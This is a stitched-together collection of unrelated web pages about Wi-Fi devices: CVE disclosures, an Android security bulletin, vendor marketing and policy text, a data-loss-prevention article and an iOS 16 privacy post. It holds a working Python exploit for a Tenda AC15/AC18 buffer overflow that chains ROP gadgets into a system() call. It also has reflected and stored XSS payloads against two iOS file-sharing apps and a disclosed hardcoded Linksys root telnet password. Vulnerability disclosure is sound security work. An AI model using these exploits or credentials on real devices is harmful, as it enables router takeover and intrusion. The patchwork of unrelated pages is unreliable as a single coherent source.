Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router V15.03.05.19_multi were discovered to contain a buffer overflow via the page parameter at /goform/NatStaticSetting.

Vendor of the products:　Tenda

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　AC15 V15.03.05.19\_multi, AC18 V15.03.05.19\_multi

**Overview**

An issue was discovered on Tenda AC15 V15.03.05.19\_multi and AC18 V15.03.05.19\_multi device. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the **/goform/NatStaticSetting** page parameter for a post request, the value is directly used in a _sprintf_ function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

**PoC**

**Exp**

import requests
from urllib import parse
from pwn import \*

main\_url \= "http://127.0.0.1:80"

def login\_success():
    global password
    url \= main\_url + "/login/Auth"
    s \= requests.Session()
    s.verify \= False
    headers \= {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    data \= {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"}
    data \= parse.urlencode(data)

    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    password \= response.cookies.get\_dict().get("password")
    print(response)
    if password is None:
        login\_success()
    else:
        print(password)

def poc():
    url \= main\_url + "/goform/NatStaticSetting"

    cmd \= b'echo yab....'
    libc\_base \= 0x40202000
    system\_offset \= 0x0005a270
    system\_addr \= libc\_base + system\_offset
    gadget1 \= libc\_base + 0x00018298
    gadget2 \= libc\_base + 0x00040cb8
    
    print(hex(gadget1), hex(gadget2))
    headers \= {'Cookie': 'password=' + password}
    data \= b'op=no&page='+ b'A' \* (244) + p32(gadget1) + b'A' \* 16 + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
    data \= data.decode('latin1')
    print(len(data))
    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    print(response.text)

if \_\_name\_\_ \== "\_\_main\_\_":
    login\_success()
    poc()

**Vul Details****Codes in httpd**

**Attack Effect**

CVE-2022-38326: Vuls/Vul_NatStaticSetting.md at main · 1160300418/Vuls

There is a remote code execution (RCE) vulnerability in Tenhot TWS-100 V4.0-201809201424 router device. It is necessary to know that the device account password is allowed to escape the execution system command through the network tools in the network diagnostic component.

**匠心设计，工业级标准**

内置工业级元件，经典外壳设计；

强效散热设计，智能降噪；

**全千兆5口**，1个WAN口，1个LAN口，3个WAN/LAN口；

带机量100人，可同时管理32台腾狐无线AP。

**稳定，仅是标配**

高性能芯片，数据传输更稳定；

优良的策略带宽控制，智能QoS流控；

支持PPPOE、静态IP、自动获取接入、PPTP；

可在-20℃-70℃的极端环境下稳定工作。

**全面的行为管理审计**

行为管理，对内网用户的所有上网行为进行精细化的管理，屏蔽各种违法网站，营造良好的网络环境，提高工作效率；

应用控制，用户可对应用规则库内的游戏网站、在线视频、彩票、电脑页游、手游等应用进行上网限制，管理上网行为

满足公安部82号令，可广泛应用于公共场所有线及无线网络建设；

应用规则库免费升级，与时俱进，定期在线更新。

**精准的流量控制**

保障关键业务带宽，资源按需分配；

精确识别各类主流应用，可以实现对网络带宽资源的全面、精细管控；

带宽空闲时充分利用，带宽紧张时按需分配，确保网络流畅稳定。

**内置七层防火墙模块，安全保护**

对IP、MAC地址、端口和协议进行相应的放通或阻断；

防止有人利用内部网络，将内部的文件、数据上传到外部网络；

两大多WAN负载策略，有效保障网络稳定性；

支持VLAN隔离、AP隔离、端口隔离等隔离手段。

**云平台管理**

腾狐自主研发的综合性网管云平台；

针对分布式部署的设备进行统一管理；

支持微信认证等多种认证策略，多种选择的广告模板；

根据设备的实际部署情况，创建不同的区域和站点；

一目了然，整个网络所有设备的安装及上线情况。

**简单管理，方便维护**

基于中文Web网页管理，界面简洁，操作简单；

免费云端管理，集中/分组管理，远程维护；

支持微信认证、Web认证等多种认证方式；

提供网络检测：私接路由器探测、网络工具、应用控制强制开关和防火墙放通功能。

**更多丰富功能，满足多种选择**

多WAN接入，单线多拨，无缝漫游，wifi计费系统，wifi考勤系统；

支持静态IP分配批量处理，减少重复操作；

免费支持VPN功能，满足企业远程办公需求；

强大的UPnP功能，快速飙升迅雷、BT等P2P软件的下载速度；

永不停歇的产品功能更新及性能优化，提供最优质的网络产品，提升用户体验。

CVE-2022-37861: TWS100(小网关)_腾狐官网

The entire security team should share in the responsibility to secure sensitive data.

Several recent high-profile instances of data loss serve as cautionary tales for organizations handling sensitive data — including a recent case where the personal data of nearly half a million Japanese citizens was put in a compromising position when the USB drive on which it was stored was mislaid.

Regardless of industry, all businesses handle sensitive data — whether it's storing HR or payroll files that include bank information and Social Security numbers or securely logging payment details. As such, enterprises of all sizes should have a data loss prevention (DLP) strategy in place that encompasses the entire organization. Organizations should update their DLP strategy frequently, to account not only for the evolution of how we store, manage, and move data, but also for advancements in cybercrime.

Some enterprises have added information security professionals to focus exclusively on DLP, but the entire cybersecurity team should share in the responsibility to protect sensitive data. A strong DLP strategy protects customers and maintains the integrity of data operations. Here are some best practices to guide organizations as they work to deploy a new DLP strategy or improve an existing one:

**1\. Know What Data Is Sensitive**

It may be tempting for organizations to apply a universal standard for data security across their business, but putting guardrails up for all information and every process can be an expensive and onerous task. By reviewing the different types of data employees work with and have access to, leaders can determine what data qualifies as sensitive and tailor their organization's strategies to protect the data that matters most. When leaders become familiar with the flow of their organization's data, it allows them to identify the people and departments that need to emphasize cybersecurity measures the most.

**2\. Backup, Backup, Backup**

An ounce of prevention is worth a pound of cure — and when dealing with sensitive data, it may even be worth millions should an organization's data be held for ransom or result in a costly loss of IP. Once businesses have identified the specific types of data deemed sensitive, employees should back it up in multiple places, all under secure protocols. Backups protect against damage from corrupted files and accidental deletion, and they make the company less vulnerable to extortionists who may try to hold data for ransom. Backups on air-gapped storage devices or servers are the most secure as they are physically separated from the Internet and can be properly secured. 

**3\. Empower Your People**

Even the most secure data loss prevention strategy can be foiled by a successful phishing attempt or a password written in plain text. Uninformed employees can fall prey to the latest scam or social engineering, unwittingly exposing their organization's data to bad actors. When leaders empower all levels and people in their organization to be an active part of security efforts, it safeguards against data loss and theft. It's critical to provide consistent training about cybersecurity risks so that employees — from the CIO to the newest intern — are aware of the newest threats to data.

**4\. Consider the Whole Data Journey**

Even when an organization invests to create a highly secure data infrastructure, whenever sensitive data leaves that environment, those protections can unravel. For businesses using a cloud storage solution, sensitive data can be vulnerable as soon as employees use unsecured public Wi-Fi. A robust data security approach should account for all the ways employees share sensitive data, inside and outside of established platforms.

**5\. Have a Rapid Response Plan**

Following data protection best practices can make breaches, hacks, and data loss less likely. However, there's always the possibility that they may happen, so you have to have a plan in place if something does go wrong. By having a plan in place, leaders can act swiftly to mitigate damage. The specifics of each rapid response plan depend on the nature of the data that has been compromised, but a plan may involve starting a data recovery process, remotely revoking access to shared storage solutions, promptly notifying employees or customers of a vulnerability, or alerting the proper authorities or customers that a data breach has occurred. It is important to already have a rapid response team in place to quickly conduct forensics, determine what data may have been compromised, follow laws and regulations about notifications, and also direct the proper resources to ensure the correction of any identified cybersecurity vulnerability.

These best practices provide a strong baseline for how to implement a new DLP plan, and can make existing strategies more resilient and effective. While the specific protocols in a DLP plan should be designed to fit organizations' individual needs, they should always drive toward the same goal: preventing data breaches and maintaining personal and professional privacy.

5 Best Practices for Building Your Data Loss Prevention Strategy

An issue was discovered in Airties Smart Wi-Fi before 2020-08-04. It allows attackers to change the main/guest SSID and the PSK to arbitrary values, and map the LAN, because of Insecure Direct Object Reference.

With the aim of becoming **the Worldwide #1 provider of technology and solutions to Broadband operators** for smart in-home Wi-Fi solutions, Airties commits to **protect confidentiality, availability and integrity** of corporate information, personally identifiable information, information systems and business processes of Airties’ and its stakeholder’s.

  
Corporate information security covers, all parties with access to Airties information systems, including employees, visitors, contractors and consultants and all information (data) processed by Airties information systems regardless of whether it is electronic or in paper (hard copy) form.

  
**All employees of Airties are acting to protect the valuable corporate information by preventing and eliminating information security risks through:**

*   Comply with applicable ISO27001:2013 and legal requirements and other requirements to which Airties subscribers relative to its business activities.
*   Perform information security risk assessments or all information systems on a regular basis in order to identify key information risks and determine the controls required to keep those risks within acceptable limits.
*   Educate, train and motivate employees to carry out tasks by considering information security, create continual raising of awareness, protect corporate information and improve the Information Security Management System.
*   Regardless of their mission and position, all employees, suppliers and consultants follow corporate information security policies and procedures in order to protect Airties from undesired effects of possible information security incident.
*   Timely inform the Information Security Desk in case of witnessing of any kind of information security incident to increase success of incidence response efforts.

Unit Heads are the primary responsible for information security within their area of responsibility. They are responsible of conducting business processes by conforming to this Information Security Policy and related security policy and procedures.

To meet these aims and conform to best practice, Airties is committed to implementing Information Security Management System and related the security controls as set out in the ISO/IEC 27002:2013 standard.  
Top Management is also committed to providing the required resources for establishing, implementing, maintaining, and continually improving an Information Security Management System.

Any nonconformity to corporate security standards will be accepted as a security policy violation and be processed according to corporate disciplinary procedures.

CVE-2022-38789: Airties Information Security Policy | Airties

Categories: Apple
Categories: News
iOS 16 has landed and it comes with a lot of features to strengthen a user's account security and privacy. We've taken a look.



(Read more...)




The post Here are the new security and privacy features of iOS 16 appeared first on Malwarebytes Labs.

On Monday, September 12, Apple released iOS 16, which included a host of new security and privacy features.

Let's look at what these are—and some quality-of-life (QoL) changes. 

**Lockdown Mode**

As Macrumors calls it, Lockdown Mode is an "extreme" security setting ideal for those who regularly find themselves in the crosshairs of online risk and targeted sophisticated cyberattacks: Activists, journalists, and government officials.

Although this mode was made with a small fraction of iPhone users in mind, anyone can enable and use it.

Lockdown Mode disables and "strictly" limits many iPhone features when enabled, which requires restarting the device and entering a passcode. This mode blocks (among others) messages with attachments, FaceTime calls from people with whom you have no call history, and wired connection with other devices if the iPhone is locked.

**Passkey**

As we mentioned earlier this week, passkeys are a "password killer" and are used instead of passwords to sign in to a website or app. It may seem complicated if you dig into the details, but in practice it may be as simple as using Face ID or Touch ID.

Passkeys aim to help protect users from phishing attacks, malware, and other campaigns designed to steal accounts or unlawfully gain access to them.

**Clipboard consent**

Copying and pasting from the clipboard now requires explicit permission from the user. Apps are now forced to get consent the same way as when they ask for access to the phone's camera, microphone, and other sensitive data.

**Known Wi-Fi networks editing**

Here's another handy feature that makes users aware of all the Wi-Fi networks they have previously connected to so they can properly disconnect or forget that connection, even when they're not in range of the network anymore. Users can also view details about these networks.

Not only that, if iCloud Keychain is enabled on all your Apple devices, users will also see a listing of Wi-Fi hotspots those devices have connected to in the past. This listing is under Known Networks, which you can navigate to from Settings > Wi-Fi > Edit.

It's important to clear out old Wi-Fi hotspot connections so your device won't auto-connect to them in the future, especially if a hotspot owner still uses the same insecure password.

> Wow, it's frightening to see the networks in this list. So many generic hotel and airport networks that I never remembered to "forget" while still connected, and my phone would have happily tried to join any network with the same name. 😳
> 
> Thanks, @Apple, for adding this! 🙂 pic.twitter.com/txLtHfroDZ
> 
> — Thomas Reed (@thomasareed) September 13, 2022

**Rapid security response**

Software updates are essential. With so many exploits, one cannot afford to leave software unpatched. Apple has made it easier for iPhone users to apply security updates without updating the entire OS. This will also make the download of those updates quicker.

Users have the option to turn this feature on or off.

**Safety Check**

Safety Check is a new feature under Settings. Once again, this was built with ease and functionality in mind. If users want to reset all data and location access granted to apps and other people, they can do so with Safety Check.

This feature is not just for general privacy reasons, but also aimed people in complicated and abusive relationships, especially those with violent partners. A "Quick Exit" button also takes the user to the iPhone's Home screen in case they don't want to be caught using the Safety Check feature.

Safety Check has two options: Emergency Reset and Manage Sharing & Access. The former will instantly freeze information sharing with people and apps with one tap. It'll also remove all emergency contacts and reset your Apple account (ID and password).

The latter—Manage Sharing & Access—gives you a birds-eye view of what data you're sharing with whom and with what apps. If you think someone is secretly tracking or monitoring you, you go here to check. The user can cherry-pick what data they want to share with who or if they want to completely stop sharing with this person(s) or app(s).

**Face ID**

Face ID is a staple on iOS, but some Apple fans may find it a tad annoying to use it only in portrait orientation. This is no longer the case for those using iPhone 13 and above. They can now use Face ID in either portrait or landscape orientation after updating to iOS 16.

Overall, it appears Apple has attempted to cover as much ground as possible. Some new features, unrelated to security or privacy, like Live Captions, are aimed at deaf and hard-of-hearing users.

You can read more about iOS 16's new features on this page.

Here are the new security and privacy features of iOS 16

In the SEPolicy configuration of system apps, there is a possible access to the 'ip' utility due to an insecure default value. This could lead to local information disclosure of network data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-219808546References: Upstream kernel

_Published September 6, 2022 Updated September 9, 2022_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2022-09-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 48 hours. We will revise this bulletin with the AOSP links when they are available.

The most severe of these issues is a high security vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2022-09-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2022-09-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Android runtime**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-22822

A-219942275

EoP

High

10, 11, 12, 12L

CVE-2022-23852

A-221255869

EoP

High

10, 11, 12, 12L

CVE-2022-23990

A-221256678

EoP

High

10, 11, 12, 12L

CVE-2022-25314

A-221384482

EoP

High

10, 11, 12, 12L

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-20218

A-223907044

EoP

High

12, 12L

CVE-2022-20392

A-213323615 \[2\]

EoP

High

10, 11, 12, 12L

CVE-2022-20393

A-233735886

ID

High

11, 12, 12L

CVE-2022-20197

A-208279300

EoP

Moderate

10, 11, 12, 12L

**System**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-20395

A-221855295

EoP

High

11, 12, 12L, 13

CVE-2022-20398

A-221859734

EoP

High

13

CVE-2022-20396

A-234440688

ID

High

12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Component

CVE

Permission Controller, Permission Controller

CVE-2022-20218

MediaProvider

CVE-2022-20395

WiFi

CVE-2022-20398

**2022-09-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2022-09-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local information disclosure of network data with no additional execution privileges needed.

    

CVE

References

Type

Severity

Component

CVE-2022-20399

A-219808546  
Upstream kernel

ID

High

SELinux

**Kernel components**

The most severe vulnerability in this section could lead to local escalation of privilege in system libraries with no additional execution privileges needed.

    

CVE

References

Type

Severity

Component

CVE-2021-4083

A-216408350  
Upstream kernel

EoP

High

Kernel

CVE-2022-29582

A-231494876  
Upstream kernel

EoP

High

fs

**Imagination Technologies**

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies.

   

CVE

References

Severity

Component

CVE-2021-0697

A-238918403\*

High

PowerVR-GPU

CVE-2021-0942

A-238904312\*

High

PowerVR-GPU

CVE-2021-0943

A-238916921\*

High

PowerVR-GPU

CVE-2021-0871

A-238921253\*

High

PowerVR-GPU

**MediaTek components**

This vulnerability affects MediaTek components and further details are available directly from MediaTek. The severity assessment of this issue is provided directly by MediaTek.

   

CVE

References

Severity

Component

CVE-2022-26447

A-237956326  
M-ALPS06784478\*

High

BT firmware

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

   

CVE

References

Severity

Component

CVE-2022-20385

A-238379819  
U-1903041\*

High

kernel

CVE-2022-20386

A-238227328  
U-1903099\*

High

Android

CVE-2022-20387

A-238227324  
U-1872920\*

High

Android

CVE-2022-20388

A-238227323  
U-1872920\*

High

Android

CVE-2022-20389

A-238257004  
U-1872920\*

High

Android

CVE-2022-20390

A-238257002  
U-1872920\*

High

Android

CVE-2022-20391

A-238257000  
U-1872920\*

High

Andorid

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Component

CVE-2022-22095

A-223210037  
QC-CR#3168780  
QC-CR#3088894

High

Kernel

CVE-2022-25656

A-228101796  
QC-CR#3119439 \[2\]  
QC-CR#2998082 \[2\]

High

Kernel

CVE-2022-25670

A-235102548  
QC-CR#3104235

High

WLAN

CVE-2022-25693

A-235102897  
QC-CR#3141474

High

Display

CVE-2022-25704

A-235102694  
QC-CR#3155069 \[2\]

High

Bluetooth

CVE-2022-25706

A-235102901  
QC-CR#3155132

High

Bluetooth

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Component

CVE-2022-25708

A-235102756\*

Critical

Closed-source component

CVE-2022-22066

A-223209292\*

High

Closed-source component

CVE-2022-22074

A-235102567\*

High

Closed-source component

CVE-2022-22081

A-235102758\*

High

Closed-source component

CVE-2022-22089

A-235102568\*

High

Closed-source component

CVE-2022-22091

A-223209291\*

High

Closed-source component

CVE-2022-22092

A-223211216\*

High

Closed-source component

CVE-2022-22093

A-223209815\*

High

Closed-source component

CVE-2022-22094

A-223210036\*

High

Closed-source component

CVE-2022-25669

A-235102508\*

High

Closed-source component

CVE-2022-25686

A-235102899\*

High

Closed-source component

CVE-2022-25688

A-235102421\*

High

Closed-source component

CVE-2022-25690

A-235102422\*

High

Closed-source component

CVE-2022-25696

A-235102900\*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2022-09-01 or later address all issues associated with the 2022-09-01 security patch level.
*   Security patch levels of 2022-09-05 or later address all issues associated with the 2022-09-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2022-09-01\]
*   \[ro.build.version.security\_patch\]:\[2022-09-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2022-09-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2022-09-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2022-09-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

September 6, 2022

Bulletin Published

1.1

September 9, 2022

Bulletin revised to include AOSP links  
Revised CVE Table

CVE-2022-20399: Android Security Bulletin—September 2022  |  Android Open Source Project

The CMS8000 device does not properly control or sanitize the SSID name of a new Wi-Fi access point. A threat actor could create an SSID with a malicious name, including non-standard characters that, when the device attempts connecting to the malicious SSID, the device can be exploited to write arbitrary files or display incorrect information.

CVE-2022-3027

On Linksys E5350 WiFi Router with firmware version 1.0.00.037 and lower, (and potentially other vendors/devices due to code reuse), the /SysInfo.htm URI does not require a session ID. This web page calls a show_sysinfo function which retrieves WPA passwords, SSIDs, MAC Addresses, serial numbers, WPS Pins, and hardware/firmware versions, and prints this information into the web page. This web page is visible when remote management is enabled. A user who has access to the web interface of the device can extract these secrets. If the device has remote management enabled and is connected directly to the internet, this vulnerability is exploitable over the internet without interaction.

Affected Products: Linksys E5350 AC1000 WiFi Router (Possibly More Models)  
Affected Versions: 1.0.00.037 and lower  
Vulnerability Type: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

  
Description: The SysInfo.htm webpage on Linksys E5350 AC1000 WiFi routers versions 1.0.00.037 and lower exposes plaintext WPA2 passwords, MAC addresses, firmware versions, and other identifiers without authentication. If remote management is enabled, this vulnerability is exploitable remotely over the internet.

Recently, I began analyzing my Linksys E5350 WiFi router to see if I could find any  
vulnerabilities. I noticed that the firmware update mechanism supports an easy to use  
update mechanism, and employs a signed update, which was good. I found that I am  
running the most recent version of the firmware, 1.0.00.033 (note the vendor did push a newer version of the firmware in May 2022 after I wrote this, which does **not** remediate the issue, so FW version 1.0.00.037 is still vulnerable after testing )

I discovered some information disclosure vulnerabilities when I began searching for any  
files accessible via the router’s httpd web server, specifically files that were not available  
to be accessed via normal browsing.  
Using directory brute force tools like Gobuster or Dirbuster, or using firmware analysis  
will reveal SysInfo.htm:

We can view the source code of the document, and see that it does not require a session  
ID like the rest of the pages hosted on the router’s httpd service. The file is only one line  
of code which calls an information gathering function, but **doesn’t require a session ID**:

After extracting the httpd binary, we can disassemble it using open source tools like Ghidra, viewing  
the assembly code and a decent C representation. We can see show\_sysinfo function extracts several bits of confidential information from the device without requiring authentication. Some examples of the data disclosed are WPA2 passwords, MAC Addresses, SSIDs, serial numbers, and so on:

We can confirm this behavior by viewing the router with an empty session, and not  
logging in, and then trying to access the /SysInfo.htm URI:

Note that the Passwords and other confidential information has been covered, but the WPA passwords are displayed in plaintext, as well as all MAC addresses in use on the device.

We can see that this page does not require authentication, exposing information about  
the device which should be restricted to authenticated users only, including  
cryptographic secrets (WPA2 passwords). A user may only be granted access to the 2.4  
ghz network, but now have the password for the 5GhZ. The WPS Pin number is also  
exposed.

  
I noticed during my analysis that this device has an option to disable firmware upgrades  
over remote management. Therefore, I decided to test if this vulnerability is also present  
when the httpd service is exposed over a WAN connection (internet facing), which increases the impact of the vulnerability. Note in the earlier screenshots the 192.168.2.1 IP range, this is the LAN side of the WiFi router.

  
Connecting from the WAN side in the 10.x range, as the 10.x IP address is assigned to  
the WiFi router via a Firewall DHCP server.

Now, we can test the /SysInfo.htm URI again and see if it works:

This vulnerability allows a threat actor with the ability to connect to the remote  
management interface (over the internet) to harvest the WPA passwords, MAC Addresses, serial numbers, and software versions of the device without authentication. The exposed passwords could also be used to gain access to the administrator interface. The unique identifiers that are leaked allow tracking of users that are using these routers.

Since the MAC Address of the wireless card is leaked, a threat actor could correlate data gathered from this vulnerability with WiFi Access Point mapping services and pinpoint the physical location of a device they enumerated over the internet.

Due to the popularity of the router, as well as the commonality of remote management  
by advanced users, this likely exposes tens of thousands of routers to password disclosure. Using open source websites like Shodan I was able to confirm over 1000 devices similar to mine located in the United States which have a unique string in the HTTP request that allows them to be fingerprinted.

Additionally, I found that when setting up remote management, HTTP is checked by  
default instead of HTTPS. This means the majority of administrators will unknowingly  
lessen the security.

**Hardcoded Linksys Telnet Password**

In addition to the previous information disclosure vulnerability, I was able to discover that all of these devices use the same hard coded telnet password.

To preface, telnet is disabled by default, so this issue would only affect users which have enabled telnet.

A hidden menu, System.asp, has very useful info about the device which does not  
compromise security, and was nice to see that Linksys included it. Please note the  
System.asp menu does require authentication, and it provides all the information  
available via SysInfo.htm. An easy resolution to the SysInfo.htm vulnerability is simply  
to delete the file and push a firmware update.

Inside the System.asp menu, there is a button to enable/disable telnet. However, once telnet is enabled, the credentials for the web admin interface are not accepted, and I could not find credentials on the internet.

Using a simple grep statement to search the filesystem, we find a credential for an  
account named “root”:

Now, we can enable telnet at the System.asp menu:

Now we can connect to the device using telnet, and observe we obtain a root shell using  
the obtained credentials:

This becomes an issue if an advanced user has enabled telnet, but did not disable it, and  
anyone can now connect as root to the router and cause damage or infect the device.  

Additionally, we can observe the same telnet credentials in a configuration backup file accessible via the Web Interface (config backup option):

A way to resolve this issue is to randomize the root password for every device, so an  
advanced or authorized user can enable and access telnet if they wish, but then all  
devices will have a unique password, mitigating any knowledge of the “cbt4blk”  
password.

I will put out another article that details my explorations of this device as far as non-security related findings go.

It appears this device has shared code with many other routers / IOT devices, so other devices may also may be vulnerable. I used the following article as a reference, which describes finding many vulnerabilities in Cisco ATA phone adapters, and I could notice shared code between the two devices (although the vulnerabilities from the article were patched for this device):

https://medium.com/tenable-techblog/rce-in-cisco-voip-adapters-115784b6d32b

I attempted to contact Linksys via their bug bounty program on bugcrowd and submitted this vulnerability in March 2022. As of July 7 2022, the report has not been acknowledged or responded to in any way by Linksys even after multiple attempts to reach out.

CVE-2022-35572: Linksys E5350 Password Disclosure Vulnerability (CVE-2022-35572)

mbDrive Lite WiFi Flash Disk version 1.4.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage:https://apps.apple.com/us/developer/haw-yuan-yang/id291212805# Software Link:https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033# Version: 1.4.0# Tested on: iPhone ios 15.6poc:http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting

AirDisk version 7.5.5 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: AirDisk 7.5.5 File Manager Stored XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424# Software Link:https://apps.apple.com/us/app/airdisk-file-manager/id566530748# Version: 7.5.5# Tested on: iPhone ios 15.61/ Starting the server ( File Transfer > Wi-fi File Transfer )2/ Go to browser3/ Enter the address showing on app eg: http://192.168.1.187:80804/ Create a folder with the name: rose'"><img src=xonerror=alert(document.location)>5/ Refresh.

Tag

#wifi